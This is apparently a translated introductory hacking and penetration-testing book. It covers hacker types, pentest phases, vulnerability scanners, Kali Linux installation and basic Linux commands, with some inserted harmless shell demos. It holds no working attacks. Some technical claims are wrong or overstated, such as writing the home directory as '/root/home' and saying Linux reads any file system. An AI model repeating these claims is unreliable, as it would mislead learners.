
Basic Hacking Techniques

This book, titled as above, contains only the real basics, for people who are just starting out and do not yet understand anything about hacking.

Those who want to study the practical side need to read the Grade 3 Hacking book.
Acknowledgements

Paying homage first to the Five Infinite Venerables, I wish to record my special thanks to my teachers, those who taught me directly and those I learned from by seeing and by hearing; to all the friends who pitched in to make this book possible; to the writer Saya Han Thu Thaw of Kaung Su Thar Sarpay, who published and distributed it; to the technology lovers who buy, support and read it; and to everyone else who deserves thanks.

The author
Disclaimer
The book I have written, Basic Hacking Guide (easy-to-learn basic hacking techniques), is intended solely for technology enthusiasts who want to work as penetration testers out of personal interest, so as to support the security field, which will soon become a necessity in our country.

Accordingly, the contents and basic techniques in this book are for Educational Purpose Only and do not encourage any cyber security breaches. Should anyone commit one, I give notice in advance that it has nothing to do with this book.

The author
DESCRIPTION
Greetings to all readers and technology lovers. I did not want to call this a foreword, so allow me to include it simply as a Description. There are a few things I would like to discuss in advance about this book, so I ask you to read these pages through to the end. I have wanted to write this book for quite a long time. For various reasons I never got to it.

Some people pushed me to write a book on hacking. That is why I carved a little out of my free time here and there and wrote this book. It is not a direct translation of any hacking book.

I did draw on a reference in writing it: Hacking with Kali (James Broad & Andrew Bindner). The chapters are arranged on the model of EC-Council's CEH modules. The remaining explanations draw on the documentation of Offensive Security, Kali's official page.

In writing this book I ran into some major difficulties. One was theory. (There is an online training course I once attended. Each of its four books, which discuss nothing but the theory of each chapter, runs to about 500 pages.) My difficulty was deciding whether to include the theory or leave it out.

I suspect most readers find theory tedious to read. But if you do not understand some of the theory, it is hard to become proficient (that is, with practice that has no theory behind it). Only by knowing the things that must be understood will you be able to apply them when a situation requires you to reason from them. So this book includes theory in condensed form, to cover it while keeping the page count manageable.

As a result, one weakness of the book is that in some places not every reader will follow fully. For example, those who already know networking will understand my condensed explanations, while those who have not yet studied networking will need to make some effort. For that reason I will keep posting recommended books and PDFs in a Facebook Secret Group. You can join the group by filling in and sending the Member Form included in this book.
The second difficulty concerns English terminology. Some terms are hard to render in Burmese, so I left them as they are; for terms that can be rendered in Burmese, I give the Burmese and the English together three or four times, and after that use the English only. The reason is this: although I repeatedly pair Vulnerability with its Burmese equivalent ("weakness"), I would like you to call it Vulnerability, and I would like readers to remember it that way. In msf you will meet abbreviations such as vulns for vulnerabilities, and I want you to understand those words when you open man pages and help output.

So the second difficulty I faced was terminology. To continue the example: I could have used the Burmese word for weakness throughout the book, but I worried that readers would no longer recognize the term in places where only English appears, so I mix in the English even where Burmese would do. Please bear with the English words scattered through the text.

This book is my first such experience, so it may have weaknesses. It is published as a foundation only, and because the field of hacking is so broad, one book could not include every technique. For example, chapters such as SQL Injection would need a separate book to cover doing the work manually. This book discusses only the parts that are done with tools.

Around May 2018 I will publish another book, Using Hacking Tools and Hacking Tricks. This book should be studied as groundwork for it. I believe that if you understand the procedures and concepts here, you will to some extent have set foot on the path of the fundamentals.
The contents of this book are not a re-compilation of what is written on my blog, www.khitminnyo.com. The blog also has material you can study. How to make a Kali Linux installer disc, how to install and use Kali Linux, how to use it in VirtualBox, how to put it on a USB stick for use in Live Mode, and so on are collected there. Installation will be discussed individually, depending on each person's computer, so there is no need to install in advance. (Those who have already installed probably do not need to redo it. Whether a reinstall is needed can still be discussed.)

In addition, for the Tools/Applications used in this book, typing the address bit.ly/kmn-app into a browser takes you to a page that collects the downloads by name. Only the latest versions are collected there, so that you always get the updated version.

Unlike other books, this one does not come with a disc. I felt that guiding you to make the disc and install from it yourself is more appropriate than bundling one. By creating it yourself you get the updated version, rather than having to upgrade from a bundled disc.

When I began writing this book, Kali Linux was at 2017.1; by the time I finished the book and am writing this description, it is at 2017.3. That is why I put more weight on readers being able to obtain and use the updated (latest) version themselves.

This description has already become rather long. In closing: do not skip over material; where something needs to be followed along, try it before reading on; and where practice is needed, do not go on to the next part before finishing (properly mastering) the current one. With that advice, let me end this description of the book.

The author
Khit Minnyo
khitminnyo@khitminnyo.com
CHAPTER 1: Introduction to Hacking
1. What Is Hacking
We have all read many times about what hacking is, so here I will present only the essentials. Hacking derives from the English word "hack" (to chop, to cut), and in computing it is defined as "gaining unauthorized access to data in a system or computer".

So in technology, hacking means obtaining and using privileges on a network, computer or system that have not been granted. In other words, it means entering that network, computer or system without permission.

The Cambridge Dictionary defines hacking as the illegal use of a computer for purposes such as obtaining information stored in a computer system or spreading viruses within such systems.

2. What Is a Hacker
Most simply, a hacker is someone who does hacking. Hackers are variously defined as people who break into systems of all kinds, who illegally take or destroy important information (data) in other people's computer systems, or who eavesdrop on communication systems (intercept data).

3. Types of Hackers
Hackers are classified by how they operate and by their attitudes. The three main groups are Black Hat Hackers, White Hat Hackers and Grey Hat Hackers.

Black Hat Hackers have good, broad computer knowledge and use it to breach or bypass Internet security. Black Hat Hackers are also called Crackers or Dark-site-hackers. People who break into computers and networks, and people who create and spread computer viruses, are Black Hat Hackers. They do not usually consider the losses their actions cause on the other side. They tend to act only in their own interest. Black hat hackers can therefore be regarded as bad actors, with bad intentions and bad deeds.

The terms Black Hat and White Hat come from an old Western saying, "The bad guys usually wore black hats and the good guys wore white ones." That is, the good guys wear white hats and the bad guys wear black hats.

White Hat Hackers, like Black Hat Hackers, look for weaknesses and holes in computer systems. The difference is that White Hat Hackers do not exploit the weaknesses they find to attack; they work out how to fix those weaknesses and make things better. Because they must take care that their testing harms no one, the work of White Hat Hackers is harder in practice. Also, when White Hat Hackers need to test a system, they first ask permission from the system's owner and then look for security weaknesses without damaging the system. When they find weaknesses, they notify the owner and look for ways to defend against them. They are people whose attitudes and conduct deserve respect.

Grey Hat Hackers are neither quite white nor quite black. They do not destroy systems as Black Hats do, but neither do they ask the owner's permission as White Hats do. Even without asking permission as White Hats do, a Grey Hat who works so as not to damage systems as Black Hats do can be counted among the not-so-bad. Most Grey Hat Hackers, however, do not care if the other side's systems are damaged by their testing. So even if you, the reader, cannot take the White Hat position, if you take care that your testing does not damage the other side's systems, you will not be counted among the bad guys.

These distinctions are based only on hackers' attitudes and behaviour. There are also classifications by skill level, which I will not go into here.
If there were no hackers in the world, I do not think the systems we use today would have become as robust and secure as they are. Black Hat hackers find weaknesses and attack. White Hat Hackers find weaknesses and defend. So White Hat Hackers, who benefit systems of every kind, have become a necessity.

Looking at the present day, internet use in our country has grown. Use of computers, use of networks, the creation and use of websites and so on can now be seen growing everywhere from tea shops to companies. As internet use grows, internet-related cyber security matters more; and in an age when banking and even international payment transactions can be done from a single phone, cyber crime is increasing too, so the role of Cyber Security has become very important.

Even if you are not interested in hacking, you now need knowledge for your own security. We have all met people around us who flatly assume that hacking is bad work. As I have discussed, hackers who will use it for good are urgently needed in our country. In the near future they will become indispensable.

To those who look down on hacking, I would say this: hacking is a weapon. Suppose there is a gun. If that gun is in the hands of a criminal, good people have cause to worry; but if the same gun is in the hands of the police, good people no longer need to worry. A gun can kill, but its effect differs depending on who holds it. The same principle applies. Take hacking to be a gun. It is not in itself a bad thing. When it is used for defence, can that same gun not bring benefits for everyone?
CHAPTER 2: Ethical Hacking (or) Penetration Testing
1. What Is Penetration Testing
Ethical Hacking, Penetration Testing and White Hat Hacking differ in name but mean the same thing. When hacking is combined with ethics, a standard of conduct, the result is Ethical Hacking.

Many corporations hire security professionals for their defence. To strengthen that defence they also buy additional security controls. But who can firmly judge whether those measures are adequate against skilled hackers? This is where penetration testing comes to play an important part.

Penetration Testing (pen-testing) means attacking a system in order to find the security weaknesses left behind by the Security Officer who draws up and carries out the defence strategy, or by the security controls.

In carrying out such a security assessment and looking for security weaknesses, you can use the Nessus vulnerability scanner. It comes in two versions, Pro and Manager, can be used free for 60 days, and can protect against WannaCry, NotPetya and other ransomware cyber attacks. It also helps make the weaknesses it finds easier to fix.

If you want to try Nessus, type bit.ly/nessus-aio into the browser's address bar to reach the download location, where you can download the version of your choice.

[Figure: how the Nessus vulnerability scanner displays vulnerabilities]

2. Penetration Testing Types

Penetration testing is carried out in imitation of real attacks, and mainly has the following objectives:
1. To determine which attacks are likely and how likely they are to succeed
2. To distinguish the low-risk holes from the high-risk holes that could be attacked
3. To find and identify holes that automated tools cannot detect
4. To determine how much the business would be affected if an attack occurred
5. To test the effectiveness of the defences and security controls
6. To find evidence (a business owner who will help make the case) so that more people are willing to invest in security technology

With these objectives, penetration testing is done not only internally but also externally. Depending on how it is carried out, it is divided into Black-box pentesting, White-box pentesting and Grey-box pentesting. I will not discuss each of these in detail here.

Penetration testing is usually carried out in the following six steps (the six steps penetration testers usually follow). They are:
1. Information Gathering
2. Footprinting
3. DNS Enumeration
4. System Fingerprinting
5. Services Probing
6. Exploit Research
As already discussed, there are two kinds of testing, external and internal. Internal testing means testing attacks as an insider. The procedure is the same as in external pentesting; the difference is that because the attack is made as an insider, the tester knows better where in the internal network to start and already has authorized access, so some parts are easier.

An attacker carrying out an external attack will have a harder time. That is because the internal pen-tester already knows what in the network is important and where it is located, whereas the external attacker has to start without knowing anything.

Sample steps carried out by external attackers are:
1. Internal Network Scanning
2. Port Scanning
3. System Fingerprinting
4. Service Probing
5. Exploit Research
6. Manual Vulnerability Testing and Verification
7. Manual Configuration Weakness Testing and Verification
8. Firewall and ACL Testing
9. Administrator Privileges Escalation Testing
10. Password Strength Testing
11. Database Security Controls Testing
12. Internal Network Scan for Known Trojans
and so on.

Penetration testing can also be automated using tools. It is not as accurate as doing it manually, but it saves time and resources. It can reduce the impact on the network, and it also reduces the kind of human mistake that could damage the system.

The advantage of manual testing is that it is carried out by skilled security professionals. Doing it that way requires planning, attack design and scheduling to be defined.

2. Vulnerability Assessment
This part can be done with a tool such as Nexpose. Developed by Rapid7, the makers of the well-known Metasploit, Nexpose is a great help in vulnerability assessment. If you want to try Nexpose, search Google for nexpose download, fill in the form at the top link, and download it. The free trial period is 30 days; for longer use you must buy it.

Nexpose can find and report, within a short time, the system weaknesses of the devices on our network. You can easily see this by installing and trying it, so I will not describe it here. Vulnerability assessment can also be done manually. You will need to know the methods for testing and finding weaknesses.

3. Area of Pentest
Penetration testing cannot be completed successfully without taking human behaviour into account. The best way to obtain sensitive information is for the exploit to be carried out through a trusted person. To do that, attackers try to make use of the employees inside the target system.

Social Engineering is commonly used for this. If an attack succeeds completely, the attacker gains the ability to do whatever they want: creating a new user account for themselves, changing root (admin) passwords, copying data, planting malware, destroying data and the system, and so on.

Pen-testers use similar techniques to find vulnerabilities, and they must also estimate in advance the damage those vulnerabilities could lead to. They must also consider whether sensitive information (data) is kept and used in the right place, the knowledge level of the people who hold authority, and so on. When vulnerabilities are found, those that can be removed are removed and those that can be defended are defended; for vulnerabilities that cannot be prevented, ways must be found to ensure that an attack through them causes no damage (or little).

They also have to provide relevant awareness training to the current employees (especially those who work with computers) of the company or organization they are responsible for.

What we have discussed here is not all of the concepts related to penetration testing. It is only a summary meant to convey the general idea, so let us pause here for now.
CHAPTER 3: Vulnerability Assessment

This is the vulnerability assessment touched on briefly in Chapter 2. It is also called vulnerability analysis. It means finding and exposing the weaknesses in a system or network infrastructure, and classifying and recording them by the amount of damage they could cause, their likelihood, and their impact.

Vulnerabilities are the doors through which attacks come. To put it more clearly, if a system or network has been taken over, what is certain is that there was a bug or weakness in that system. Vulnerability assessment aims to find those bugs or weaknesses, work out solutions and issue patches, and so protect the system from being taken over or broken into.

In doing this, automated tools that run without human involvement should not be used. The reason is that those tools operate within a fixed frame, so the results they produce may be wrong. Skilled, experienced professional pen-testers look at the Vulnerability Assessment Report and make their decisions by manual methods. That is, even when scanning tools are used to find vulnerabilities, the decision about a vulnerability is made by the tester's own judgement.
Using such scanning tools, we can check whether our systems have weaknesses. Some of these tools have a GUI and are easy and convenient to work with, which has the advantage that most people can use them.

On vulnerabilities, the National Vulnerability Database (NVD) also publishes security checklists, security related software flaws, misconfigurations, product names and impact metrics, which you can study at nvd.nist.gov.
For up-to-date, good CIS controls, go to www.cisecurity.org/controls. To study the Secunia Historic Advisor, which lists a great many vulnerabilities, go to bit.ly/secunia-adv; to get the Free Security Software, go to bit.ly/secunia.

Now let us continue with vulnerability scanners. The Nessus scanner, with its powerful detection, scanning and auditing features, is the most widely used vulnerability scanner in the world, and it also includes extensive management and collaboration functions. It is released in two versions, Nessus Professional for one laptop and Nessus Manager, which can work with multiple, and it gives a trial period of 2 months (60 days), which surely makes it convenient to use. To get the latest versions, download them from bit.ly/nessus-aio.

That it can not only find and report vulnerabilities but also help resolve them is probably the main reason security auditors use Nessus. Add-on plug-ins make Nessus better still, so using Nessus is surely a good choice for us. In our companies and organizations today, the Windows computers in use are more often pirated (cracked) versions than licensed ones, are rarely updated, and seldom have patches applied, so you will find that they have a great many vulnerabilities.

Using Nessus will make it easier for us to deal with these difficulties. For those who want to work as security auditors, buying and using Nessus Manager will make the work go smoothly.

IBM Security AppScan has also been found to handle web application and mobile application security well. In addition, with an application such as LanGuard, which can be used on Windows, Mac OS X and Linux platforms, you can scan for vulnerabilities and patch automatically. Microsoft Baseline Security Analyzer (MBSA) can also take care of missing security updates, which helps make your Windows systems more secure.

What I have discussed here is only a rough survey of the tools available, and they can easily be found on Google. Those who wish to can try them out. These tools are designed to be easy to use, so I will not describe each one in detail. If you want the easiest way to apply the patches your computers need, you can use HFNetChk. It can be downloaded at www.petri.com/hfnetchk.
CHAPTER 4: Kali Linux Installation

Introduction

Kali Linux can simply be thought of as the hacking OS we will be using. Linux itself is covered in the next chapter. For now I will discuss how to obtain it and how to install it.

Here I would like to add one thing, because there is a worry people tend to have. I have often been asked, "Can Linux be used on my computer?" My answer is simply: do not worry. There are also people who worry, "I want to learn hacking with Kali Linux, but my computer has little memory; will it work?" So let me explain a little.

To install Kali Linux, Kali's official page states that at least 20GB of HDD space is required. (My own additional advice is that you should have at least about 80GB, so that you can build virtual labs for your experiments.) Next, Kali's official page states that at least 1GB of RAM is required, and that 2GB is better. Here too I would add something: you should have about 2GB of RAM. With 2GB of RAM you should install only 32-bit Kali, and use 64-bit Kali only with 4GB of RAM or more.

I have also been asked, "I have to keep using Windows; can I not use Kali without installing it?" Depending on your computer, there are several ways to set up Kali Linux: 1. installing Kali Linux only; 2. installing Windows & Kali Linux as dual boot; 3. installing it as a virtual machine; and 4. using it in USB Live Mode.
Making Kali Linux Latest Installer Disc
Before installing Kali Linux, we need to download its iso image file. To download it, just type bit.ly/kalidown into the browser. You will see the latest version.

As shown above, from the top two entries in the table, 64bit and 32bit, choose the one that suits your computer and download it. Click the blue HTTP link beside it and the download starts. Those installing as a virtual machine do not need to burn a disc; downloading is enough.

One more app is needed to burn the disc: PowerISO. Type bit.ly/poweriso into the browser and press Enter.

You will see the page as shown above; choose the bit version that matches your Windows, download it and install it.

Right-click the downloaded Kali iso file and choose Open with >> PowerISO. It will appear as shown above. Insert a blank DVD into the machine. Then click the Burn icon in PowerISO.

When the next step appears as shown above, click Burn and wait until it reaches 100% and the disc ejects by itself. You have now created a Kali Linux installer disc.

Kali Linux Installation

Insert or attach the Kali installer disc/USB, power on and boot from it, and you will see the Kali Linux Boot Menu as shown above. For Live Mode, select the Live entry at the top, press Enter, wait a moment, and you can use Kali Linux. (If you use Live Mode from a disc, nothing you add this time will be there the next time you use it. It starts fresh. Live Mode is more convenient from a USB.) Here we are installing, so select Graphical Install and press Enter. Use the up and down arrow keys on the keyboard to select. Let us say you have selected it.

The next step is choosing the language. Leaving it at English is most convenient; press Enter (or) Continue.

At the next step, choosing the Location, also just press Enter (or) Continue without choosing.

This step asks you to choose the keyboard. Do nothing and press Continue.

At this step we need a wifi connection. Turn on a wifi hotspot from your phone. (It works even without the internet turned on.) Then select wlan0, and select and connect to the network broadcast from your phone. If a wifi password is set, enter the wifi password and carry on with Continue.

This step is where you enter the root password for Kali Linux. Enter the same password in both boxes. For example, apple: if the first box is apple, the second must also be apple. If you are unsure, tick the Show Password in Clear box below to view it.

At the next step, if you are asked to configure the clock, carry on without selecting anything.

Those installing Kali Linux as the only OS and those installing it as a virtual machine just press Continue as is. Those who want dual boot with Windows must select Manual and adjust the partitions first. Dual boot requires about four partitions, root, swap, boot and home, and you should decide on dual boot only if you want to study hacking in depth, have 4GB of RAM or more, and can give Kali about 150GB of HDD space.

Then press Continue. When asked whether to format the partitions as laid out, select Yes and press Enter.

Kali is now being installed.

When asked, as shown above, whether to use a Network Mirror, answer No.

At Package Manager configuration, as shown above, enter nothing and press Continue.

You will be asked whether to install GRUB. You must choose Yes.

This asks where to install GRUB. As in the picture, select the second line.

Installation is complete. The disc will eject; do not put it back in. Press Continue. The final step finishes and the machine restarts. When it comes back up, Kali Linux is ready to use.

Making Kali Live Mode USB


This part is for those who want to carry Kali Linux around on a USB stick. You can then plug it into other computers and use it there as well. First, download the Kali Linux ISO. That was covered at the very beginning, so I will not repeat it. Then download Win32diskImager from bit.ly/win32-kmn and install it on Windows.

When it finishes, you have a Live Mode USB stick that is ready to use.

Note: The topics in this chapter (installing Kali Linux, making the installation disc, dual-booting Windows and Kali, installing and using it in VirtualBox, and so on) are also shown one by one in video files at bit.ly/kali-aio. You are welcome to watch them there.
CHAPTER 5: Linux Fundamental

1. Introduction to Linux

Even those of us who have never used Linux have heard the word. We usually say Linux to mean a whole operating system, but Linux is really an operating system kernel, the part that is started by the BIOS/UEFI and the boot loader.

Linux was started in 1991 by Linus Torvalds, a Finnish student, with the aim of creating a free OS kernel. That is only a brief account of how Linux came about. I will not go into the history, because a great deal has already been written about it.

Let's continue with GNU. GNU does not mean Unix; I mention it because the two are easily confused. GNU is not Unix, but it is a Unix-like operating system, and it was launched in 1984. It is free software and does not include a kernel. Roughly speaking, GNU is a software collection that brings together applications, libraries, developer tools and the like. An OS needs another program to allocate resources and to talk to the hardware. That program is the kernel.

GNU, which came without a kernel, uses Linux as its kernel. That is why the combination is called GNU/Linux. So let's say we now have a kernel called Linux and an operating system called GNU. We call it Linux for short, but it is really GNU/Linux, and it has many millions of users. GNU also has a kernel of its own, called the Hurd, which is still not widely used today. I have not even seen it make its debut. Let's move on.

Let me say again that, out of the many Linux distros, this book concentrates on Kali Linux. I already mentioned earlier that you can come and discuss it with me if you want to install Kali Linux. If you would like to study and try it yourself, just type bit.ly/kali-aio into the address bar of your browser to learn how to obtain Kali Linux, the various ways of installing it, and other things worth knowing.

Let's assume Kali Linux is now installed. From here on we will go through the basics of Linux that you should know.

2. Unifying File System

This time we will briefly discuss the Linux file system. The file system is an important part of the kernel. Unix-like operating systems unify all file storage into a single hierarchy. A hierarchy is a collection organized by rank, or an arrangement ordered by rank.

The starting point of the hierarchical tree is called root, and its symbol is the slash, "/". The "root" directory contains many sub-directories. For example, the directory home inside the directory root is written as /root/home. If the word directory is unfamiliar, the easiest way to remember it is as what Windows calls a folder. (When we say directory, think folder.)

So /home/new/abc.txt means a txt file named abc, inside the directory new, inside the directory (folder) home, inside root (the system). The kernel is what translates between this naming system and the actual storage locations on the disks.

There are many formats that can be used to store data on disks. The main ones for Linux are ext2, ext3 and ext4. It is not easy to read Linux file systems such as ext4 from a Windows installation, but a Linux installation can read Windows file systems such as NTFS, FAT, FAT32 and so on, which is another advantage for Linux users. Put simply, files on the Linux side are not easy to see from the Windows side, while the Linux side can read any file system.
3. The Command Line

The command line is arguably the most important part of the Linux system we are about to use. With Kali Linux left as it was installed, you will see a vertical menu bar on the left-hand side. On Windows this is called the taskbar. On Linux it is called Dash to Dock. You can open the terminal from there.

The icon looks like the one in the figure above. Most tasks can be done through the GUI, but you still need to become proficient with the terminal. As you gain experience with Linux, you will understand the importance of the terminal more and more. When you open the terminal, you will see something like the figure above.

In the figure above you will see root@kali. Its form is account@host-name, so the root at the front shows the account that is currently logged in. The kali after the @ is what was entered as the host name when Kali Linux was installed, and it can be changed later from the settings. The # symbol that follows is there because the current terminal is a root terminal. If you log in with a user account other than root, you will see the $ symbol in place of #.

So now we know the terminal, we know that the prompt symbol differs between root and other accounts, and we understand that when (root@kali) appears in this book it is already on screen and does not need to be typed. Let's go on to terminal commands.

Of the terminal commands, I will go through the common, frequently used ones.
The cd command is used to go into directories. For those who have never used Linux, the simplest way to put it is that it is used to go into folders. For example, typing cd Downloads takes you into the directory (folder) called Downloads. One thing to watch: on Linux you cannot type upper and lower case loosely the way you can on Windows. Upper (or) lower case must be typed exactly.

To try cd, open a terminal. Then, to see what is in the directory you are currently in, type ls (lowercase LS) and press Enter.

The figure above shows the files and directories in the Home directory of my root account. Directories are shown in blue. Other files are shown in other colors. Looking at the entries in blue tells you which directories the current Home directory contains (the folders inside the folder).

Now let's go into the directory called Desktop.

On trying to enter as shown above, you will see bash: cd: desktop: No such file or directory. The reason is that the d in the cd desktop I typed is lowercase. If you look back at the earlier figure, you will see that Desktop is written with a capital D. Let's type it again with the capital letter.

Now we can get into Desktop. If there are files on the Desktop, you can view them with the ls command, which lists files.

There is only one folder on my Desktop, so only one is shown. If there were nothing there, nothing would be shown.

While we are on the Desktop, let's learn how to create a new folder. I have already explained that a folder is called a directory. So creating a new folder is make folder (make directory), and the command for it is mkdir, used as mkdir directory-name. For example, to create a dir named test in the current dir, type mkdir test.

After typing it as shown above, list the contents again with ls and you will see that a directory called test has been added.

In the figure above you can see the new dir called test. Let's go into it with cd. After cd test, you will see that you are inside the test folder.

Now let's create a folder whose name contains a space. Let's create a folder named test two.

As in the figure above, this is meant to create a folder named test two inside the test directory on the Desktop. But if we now open the test folder on the Desktop, what we see is two folders, test and two.

We wanted a single folder called test two, and we got two folders. The reason is the space in the name. On the command line, a space marks the start of a separate item. That is why Linux files that will be used from the command line are named without spaces.

I created one more with mkdir test-three, as in the figure above.

As in the figure above, only one folder, test-three, was added. But what we want is a folder with a space in its name. So how is that done? When a Linux command needs to contain a space, the text has to be placed between "...." (opening and closing double quotes).

As in the figure above, typing mkdir "test four", with the folder (directory) name containing the space between double quotes, gives us a folder with the spaced name we wanted.

You will have guessed that the " " is needed when entering it with cd as well.

We are now inside the test four directory. Next, let's look at how to go back out.

As in the figure above, typing cd followed by two dots (..) and pressing Enter goes back one folder level. To go all the way back, type just cd and press Enter.

Now open a new terminal and go into each dir again, one at a time.

The figure above shows going into each dir one by one, starting from a freshly opened terminal. If you already know the dirs, you do not need to go in one level at a time with many commands as in the figure; you can go there directly.

The figure above shows the difference between going in one level at a time with cd and going in directly with a single cd command.
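The space and upper/lower-case behaviour described above, as an added example that is not from the book. It works in a throwaway directory created with mktemp, all names are constructed, and it also shows that the same splitting affects rm, where the wrong folder is the one that gets deleted.

```shell
#!/bin/sh
# Added demo. Every name here is constructed and lives in a mktemp directory.

# Print the entries of directory $1 as one comma-separated line.
list_names() {
    ls -1A "$1" | paste -sd, -
}

# $1 = unquoted | quoted. Create "test two" both ways and report what exists.
mkdir_demo() {
    work=$(mktemp -d) || return 1
    if [ "$1" = quoted ]; then
        ( cd "$work" && mkdir "test two" )   # one argument -> one directory
    else
        ( cd "$work" && mkdir test two )     # two arguments -> "test" and "two"
    fi
    list_names "$work"
    rm -rf "$work"
}

# Start with the folders "test" and "test four", try to delete "test four",
# and report which folder survives.
rm_demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/test" "$work/test four"
    if [ "$1" = quoted ]; then
        ( cd "$work" && rm -r "test four" )
    else
        # Unquoted: rm is given "test" and "four". It deletes "test" and
        # complains that "four" does not exist.
        ( cd "$work" && rm -r test four 2>/dev/null ) || true
    fi
    list_names "$work"
    rm -rf "$work"
}

# Only "Desktop" exists; report whether cd into the spelling $1 works.
cd_demo() {
    work=$(mktemp -d) || return 1
    mkdir "$work/Desktop"
    if ( cd "$work/$1" 2>/dev/null ); then echo ok; else echo fail; fi
    rm -rf "$work"
}

echo "mkdir test two      -> $(mkdir_demo unquoted)"
echo "mkdir \"test two\"    -> $(mkdir_demo quoted)"
echo "rm -r test four     -> left behind: $(rm_demo unquoted)"
echo "rm -r \"test four\"   -> left behind: $(rm_demo quoted)"
echo "cd desktop          -> $(cd_demo desktop)"
echo "cd Desktop          -> $(cd_demo Desktop)"
```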
Now let's move on to writing text. So that the terminals do not pile up, close the ones that are open and open a new one. Then go into the folder called test on the Desktop. A small point here: the Kali Linux we are using has text editors that run as pop-up (GUI) apps as well as ones that are used on the command line. You need to put more study into working from the command line, because what we are learning is hacking.

I said there are programs for writing text. leafpad, gedit, vim and others are commonly used. leafpad and gedit work on the same principle and differ only in appearance. Let's try this from the command line. Create a file called test.txt with either leafpad or gedit.

Typing leafpad test.txt opens a file in leafpad, and you can type whatever text you like in it. Then save it and close it. If you now list the directory with ls, you will see the test.txt file we created.

If you open the test folder on the Desktop, you will also see test.txt, as in the figure above. gedit is just like leafpad. Try it again with gedit in place of leafpad.

Now let's write text and create a file from the command line alone.

In the figure above you can see text being written with echo. The text you want to write goes between double quotes, and the name of the file you want goes after the > symbol. If you then list the directory with ls, you will see that another file, test2.txt, has been added.

If you open the folder, you will see the same thing. Opening test2.txt shows the This is my testing. that we typed. Let's go back to the command line.

In the figure above you can see the cat command being used to display the text that was typed. Its usage has the form cat file-name.

So far we have covered creating a txt file and writing text from the terminal, and printing the text back out. Now let's add another line to the test2.txt file.

In the command line I typed echo "I am learning Ethical Hacking." > test2.txt. The idea is to change the text inside test2.txt to I am learning Ethical hacking.

In the figure above you can see that the original text, This is my testing., has been replaced by I am learning Ethical hacking. If you only want to add text rather than change it, use >> (two of them) in place of >.

In the figure above, the intention is to add the text Ethical Hacker to the original lines. Because >> is used, we know the text will be appended.

In the figure above, displaying the file with cat shows that the lines have been added. I take it that much is understood. Now let's discuss finding files. Close the open terminal and open a new one. Then let's try searching with the find command. Its usage is find <place to search> -name <file name to search for>. To make it clearer, suppose we want to find the test2.txt file in the folder we created on the Desktop. The command for searching is find, the place to search is Desktop, -name says that a file name follows, and the file name is test2.txt, so the command to use is find Desktop -name test2.txt.

When we run the search, it shows, as in the figure above, that test2.txt is in the folder called test on the Desktop. This worked because we knew that test2.txt was on the Desktop. Suppose we do not know where it is. Then we have to search the whole system. The symbol for the system is /, the root of the system. So when searching, put just / as the place to search.

In the figure above we searched the whole system for test2.txt. The result is /root/Desktop/test/test2.txt, which tells us it is in the directory called test on the Desktop. One more point: I said earlier that a Linux system is case sensitive. If the upper or lower case is wrong, the search will not find the file. So we have to know whether the T in the file name is upper or lower case and write it exactly. If you do not know, write the file name as [Tt]est2.txt, which means show it whether the first letter is upper or lower case.

If you know that the file name contains test but are not sure of the whole name, you can search like this.

This prints every file that has test in its name, so it will find a great many files. I take it that searching is now clear. Next I will split the other commonly used commands into small sub-headings, so that they are easier to remember.
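The difference between > and >>, and the find patterns described above, as an added example that is not from the book. The files are constructed under a mktemp directory; set -C and -iname are real shell and find options that the book does not mention, included here because they guard against an accidental overwrite and an unknown letter case.

```shell
#!/bin/sh
# Added demo; file names and contents are constructed, created under mktemp.

# Number of lines in file $1.
lines_in() { wc -l < "$1" | tr -d ' '; }

# Number of lines arriving on stdin.
count() { wc -l | tr -d ' '; }

# Prints three line counts: after overwriting with >, after appending with >>,
# and after an overwrite attempt that noclobber blocks.
redirect_demo() {
    work=$(mktemp -d) || return 1
    f="$work/test2.txt"
    echo "This is my testing." > "$f"
    echo "I am learning Ethical Hacking." > "$f"   # > truncates: still 1 line
    after_overwrite=$(lines_in "$f")
    echo "Ethical Hacker" >> "$f"                  # >> appends: 2 lines
    after_append=$(lines_in "$f")
    # set -C (noclobber) makes > refuse to overwrite a file that exists.
    ( set -C; echo "oops" > "$f" ) 2>/dev/null || true
    after_guard=$(lines_in "$f")
    echo "$after_overwrite $after_append $after_guard"
    rm -rf "$work"
}

# Prints four match counts: exact name, [Tt] bracket, -iname, and *test*.
find_demo() {
    work=$(mktemp -d) || return 1
    top="$work/Desktop"
    mkdir -p "$top/test"
    : > "$top/test/test2.txt"
    : > "$top/test/Test2.txt"
    : > "$top/notes.txt"
    # Patterns are quoted so that find receives them unchanged; unquoted, the
    # shell would expand *test* against the current directory first.
    exact=$(find "$top" -name 'test2.txt' | count)       # lowercase t only
    either=$(find "$top" -name '[Tt]est2.txt' | count)   # T or t
    anycase=$(find "$top" -iname 'TEST2.TXT' | count)    # ignore case entirely
    partial=$(find "$top" -name '*test*' | count)        # folder test + test2.txt
    echo "$exact $either $anycase $partial"
    rm -rf "$work"
}

echo "lines after >, >>, blocked >: $(redirect_demo)"
echo "matches exact, [Tt], -iname, *test*: $(find_demo)"
```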

APT Package Handling Utility


The APT Package Handling Utility is best known as apt-get. It is a very easy and good tool for installing, removing and upgrading packages. The Kali Linux we use has a source from which applications can be obtained, rather like the Play Store on the Android phones we use. Once our computer is connected to that source, software packages can be installed easily through apt-get. Installing software through apt-get has advantages. The main one is that it also installs the dependencies a package needs (put simply, the further requirements that the package is linked to). So there is no need to hunt them down and add them one by one.

To give a clearer example, a program like Metasploit, which pen-testers and hackers use constantly, depends on the programming language called Ruby. Metasploit cannot run unless Ruby is installed. So Ruby is a dependency of Metasploit. (Metasploit is already included in the Kali Linux we will use, so it goes without saying that Ruby is included too.) To sum up, when apps are installed through apt-get, their dependencies are installed automatically along with them. Take apt-get install virtualbox, for example: the apps that have to be used together with virtualbox are installed as well.

For this to work, open the sources.list file in /etc/apt/ with leafpad (or) gedit and add the sources to it. The contents of sources.list can differ depending on the version of Kali Linux you have installed, so I will not show them here. They are given at www.khitminnyo.com. apt-get install (package) does not work for every package. You can only get the packages that are available from the sources you have added; other packages can be downloaded from their own sources. Kali Linux is Debian based, so its packages are Debian packages (dpkg). Ubuntu is also Debian based, so Debian packages (dpkg) can be used in the same way on Ubuntu and Kali. The file extension of these packages is .deb, for example example.deb.

To install deb files, use dpkg -i. That is, it installs Debian packages. From the terminal, go to the place where the .deb file is kept. Then you can install it with dpkg. For example, suppose you want to install the example.deb you downloaded. Go into the Downloads directory with the cd command and install it with dpkg -i pkg-name.deb.

